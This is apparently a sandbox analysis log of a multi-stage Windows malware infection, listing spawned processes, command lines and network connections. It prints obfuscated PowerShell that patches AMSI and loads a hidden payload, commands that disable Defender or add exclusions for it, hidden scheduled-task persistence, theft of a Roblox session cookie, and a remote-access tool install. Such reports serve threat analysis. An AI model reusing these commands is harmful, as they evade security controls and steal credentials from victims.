C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\ogvuzz.exe
"C:\Users\Admin\AppData\Local\Temp\ogvuzz.exe"
C:\Users\Admin\AppData\Local\Temp\kjksfm.exe
"C:\Users\Admin\AppData\Local\Temp\kjksfm.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\3EUA1N7YM7GV" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GGDTAurbPjhG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$upMJEotdnSOYTb,[Parameter(Position=1)][Type]$cvcSumdDCy)$sHrBsgwMjqE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+'r'+'y'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+'y'+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+'ed,'+[Char](65)+'nsi'+[Char](67)+'l'+'a'+''+'s'+'s,'+'A'+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$sHrBsgwMjqE.DefineConstructor(''+'R'+''+[Char](84)+'S'+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+'P'+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$upMJEotdnSOYTb).SetImplementationFlags(''+[Char](82)+''+'u'+'nti'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$sHrBsgwMjqE.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$cvcSumdDCy,$upMJEotdnSOYTb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $sHrBsgwMjqE.CreateType();}$WUengfvZVNnwg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$wvZsmdVBBsoKxH=$WUengfvZVNnwg.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+'r'+'oc'+'A'+''+'d'+''+'d'+'re'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c,'+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OmBTuKkCHUeHlzskJht=GGDTAurbPjhG @([String])([IntPtr]);$rvbXxDNBqgQvMkVzqqXMJz=GGDTAurbPjhG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QxwgbfyvxbM=$WUengfvZVNnwg.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+'n'+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$CjiRWscZXVIpxl=$wvZsmdVBBsoKxH.Invoke($Null,@([Object]$QxwgbfyvxbM,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$POejDketRWZfGKzPZ=$wvZsmdVBBsoKxH.Invoke($Null,@([Object]$QxwgbfyvxbM,[Object]('Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$ZMIOqcm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CjiRWscZXVIpxl,$OmBTuKkCHUeHlzskJht).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$ZnWpBYzVbkdGRRSZh=$wvZsmdVBBsoKxH.Invoke($Null,@([Object]$ZMIOqcm,[Object]('Am'+'s'+''+'i'+'S'+'c'+'a'+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'er')));$WMVZltptte=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($POejDketRWZfGKzPZ,$rvbXxDNBqgQvMkVzqqXMJz).Invoke($ZnWpBYzVbkdGRRSZh,[uint32]8,4,[ref]$WMVZltptte);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZnWpBYzVbkdGRRSZh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($POejDketRWZfGKzPZ,$rvbXxDNBqgQvMkVzqqXMJz).Invoke($ZnWpBYzVbkdGRRSZh,[uint32]8,0x20,[ref]$WMVZltptte);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+[Char](115)+''+[Char](115)+''+'t'+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a70fcfc6-8af3-4883-9818-76b14d386a0f}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6420" "2084" "2072" "2264" "0" "0" "2284" "0" "0" "0" "0" "0"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KWkHOtULmMVP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LZAjoxYnYuxQGE,[Parameter(Position=1)][Type]$oOswvOLpsU)$XTepPiNBtaG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+'eT'+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+'a'+'s'+''+'s'+'',[MulticastDelegate]);$XTepPiNBtaG.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$LZAjoxYnYuxQGE).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$XTepPiNBtaG.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+'i'+''+'c'+','+[Char](72)+''+'i'+'deBy'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+'S'+''+[Char](108)+''+[Char](111)+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$oOswvOLpsU,$LZAjoxYnYuxQGE).SetImplementationFlags('Ru'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+'e'+'d'+'');Write-Output $XTepPiNBtaG.CreateType();}$TKFMtlbzxPTAH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+'o'+''+[Char](115)+'o'+'f'+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$FHRFbcAFIkLNqs=$TKFMtlbzxPTAH.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'r'+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bhRLxDsknEXAtBGIwtc=KWkHOtULmMVP @([String])([IntPtr]);$qGVrCheywwduwXwbSDlUdh=KWkHOtULmMVP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JFcPzOLEOwz=$TKFMtlbzxPTAH.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'eHa'+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$RSknWFmCeoUgwt=$FHRFbcAFIkLNqs.Invoke($Null,@([Object]$JFcPzOLEOwz,[Object](''+'L'+''+[Char](111)+''+'a'+'d'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$VAhhJsMVzvrLfATcs=$FHRFbcAFIkLNqs.Invoke($Null,@([Object]$JFcPzOLEOwz,[Object](''+'V'+'ir'+'t'+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+'r'+'o'+'t'+[Char](101)+''+'c'+''+'t'+'')));$OtOqerW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RSknWFmCeoUgwt,$bhRLxDsknEXAtBGIwtc).Invoke(''+[Char](97)+'m'+[Char](115)+'i.'+'d'+'l'+[Char](108)+'');$pjenlVCqaLMTEEEZa=$FHRFbcAFIkLNqs.Invoke($Null,@([Object]$OtOqerW,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$JkbwwJGwtL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VAhhJsMVzvrLfATcs,$qGVrCheywwduwXwbSDlUdh).Invoke($pjenlVCqaLMTEEEZa,[uint32]8,4,[ref]$JkbwwJGwtL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pjenlVCqaLMTEEEZa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VAhhJsMVzvrLfATcs,$qGVrCheywwduwXwbSDlUdh).Invoke($pjenlVCqaLMTEEEZa,[uint32]8,0x20,[ref]$JkbwwJGwtL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](114)+''+'u'+''+[Char](116)+'s'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6364 -ip 6364
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1920" "2384" "2108" "2388" "0" "0" "2392" "0" "0" "0" "0" "0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.134.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
